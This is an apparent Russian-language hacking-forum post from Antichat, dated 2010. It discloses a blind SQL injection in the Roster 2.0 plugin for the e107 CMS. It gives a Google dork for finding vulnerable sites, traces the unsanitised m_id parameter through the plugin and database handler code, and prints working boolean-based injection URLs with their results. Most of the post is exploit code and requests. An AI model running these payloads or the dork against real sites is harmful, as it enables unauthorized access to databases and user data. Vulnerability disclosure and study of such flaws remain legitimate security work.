
30.04.2010, 16:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Roster by Carl Taylor Version 2.0
гугл- inurl:/e107_plugins/roster
Blind SQL inj
[path]/e107_plugins/roster/userinfo.php
PHP код:
...
//html file
require_once("html/roster_userinfo.php");
$html = new userinfo_html;
switch($_GET['action']){
default:
$text = $html->uinfo_show($_GET['m_id']);
}...
[path]/e107_plugins/roster/html/roster_userinfo.php
PHP код:
...
Class userinfo_html {
function uinfo_show($m_id) {
global $sql;
// get the member
$member_q = $sql->db_Select("roster_members", "*", "roster_member_id='".$m_id."'");
$member_a = $sql->db_Fetch(MYSQL_ASSOC);
$rank = explode(",", $member_a['roster_member_rank']);
$enlisted = date("dMY", $member_a['roster_member_enlisted']);
$enlisted = strtoupper($enlisted);
$patterns[0] = "/JUN/";
$patterns[1] = "/JUL/";...
[path]/e107_handlers/mysql.class.php
PHP код:
...function db_Select($table, $fields = '*', $arg = '', $mode = 'default', $debug = FALSE, $log_type = '', $log_remark = '') {
global $db_mySQLQueryCount;
$table = $this->db_IsLang($table);
$this->mySQLcurTable = $table;
if ($arg != '' && $mode == 'default')
{
if ($this->mySQLresult = $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table.' WHERE '.$arg, NULL, 'db_Select', $debug, $log_type, $log_remark)) {
$this->dbError('dbQuery');
return $this->db_Rows();
} else {
$this->dbError("db_Select (SELECT $fields FROM ".MPREFIX."{$table} WHERE {$arg})");
return FALSE;
}
} elseif ($arg != '' && $mode != 'default') {
if ($this->mySQLresult = $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table.' '.$arg, NULL, 'db_Select', $debug, $log_type, $log_remark)) {
$this->dbError('dbQuery');
return $this->db_Rows();
} else {
$this->dbError("db_Select (SELECT {$fields} FROM ".MPREFIX."{$table} {$arg})");
return FALSE;
}
} else {
if ($this->mySQLresult = $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table, NULL, 'db_Select', $debug, $log_type, $log_remark)) {
$this->dbError('dbQuery');
return $this->db_Rows();
} else {
$this->dbError("db_Select (SELECT {$fields} FROM ".MPREFIX."{$table})");
return FALSE;
}
}
}...
PHP код:
...function dbError($from) {
if ($error_message = @mysql_error()) {
if ($this->mySQLerror == TRUE) {
message_handler('ADMIN_MESSAGE', '<b>mySQL Error!</b> Function: '.$from.'. ['.@mysql_errno().' - '.$error_message.']', __LINE__, __FILE__);
return $error_message;
}
}
}...
К сожелению ошибки от СУБД отключены:
PHP код:
function db_Connect($mySQLserver, $mySQLuser,$mySQLpassword, $mySQLdefaultdb)
...
$this->mySQLerror = FALSE;
...
Result:
http://[host]/[path]/e107_plugins/roster/userinfo.php?m_id=1'+and+substring(version(),1,1)= 5--+
Контент выводится!
http://[host]/[path]/e107_plugins/roster/userinfo.php?m_id=1'+and+substring(version(),1,1)= 4--+
Контент не выводится!
Условие: mg=off
roster_sql.php - в скрипте структура єтого плагина бес дескрипторов!
путь - http://[host]/[path]/e107_plugins/roster/log/userclass2.php
Последний раз редактировалось Strilo4ka; 30.04.2010 в 16:21..
|
|
|